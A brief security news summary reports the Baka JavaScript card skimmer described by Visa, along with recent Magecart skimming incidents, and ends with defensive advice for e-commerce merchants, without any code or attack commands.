Go to listing page

New Stealthy JavaScript Skimmer Found Targeting E-Commerce Merchants

New Stealthy JavaScript Skimmer Found Targeting E-Commerce Merchants
With new camouflaged schemes to evade detection, web skimming attacks have continued to pose a major security threat to the e-commerce sector in 2020. Recently, multiple online stores from several countries have been compromised using a new JavaScript skimming malware dubbed Baka.

The background

Active since February 2020, Baka is the first JavaScript skimming malware to use an XOR cipher to obfuscate the skimming code downloaded from the C2 server and any hard-coded values. The C2 server used by the Baka malware also used to host the ImageID web skimming kit.

What happened recently?

  • In late August 2020, Visa Payment Fraud Disruption (PFD) reported seven C2 servers hosting the Baka skimmer.
  • The skimming kit has regular basic skimming features such as data exfiltration using image requests and configurable target form fields, along with a unique obfuscation method and loader.

Recent skimmer attacks

Magecart and other digital skimming attacks have been causing significant brand damage by stealing customers’ credit card numbers from websites or checkout pages.
  • This month, Magecart hackers compromised a number of US-based online stores managed by Warner Music.
  • Moreover, a variant of the Magecart credit card skimmer was found using Telegram Messenger to collect and transmit the information from data harvesting scripts.
  • In August, American Payroll Association suffered a skimming cyberattack.
  • In the same month, Magecart attackers were using homoglyph techniques to fool users into visiting malicious websites in a credit card skimming campaign.

Best practices

Visa has been alerting member financial institutions, e-commerce merchants, service providers, third-party vendors, system integrators, and resellers to prevent such threats from causing security breaches. Organizations should protect their e-commerce environments by utilizing trsuted Content Delivery Networks (CDNs), web application firewall, content security policy (CSP), and other security measures. They should apply the latest security patches for their deployed content management systems (CMSes) and e-commerce frameworks.

Cyware Publisher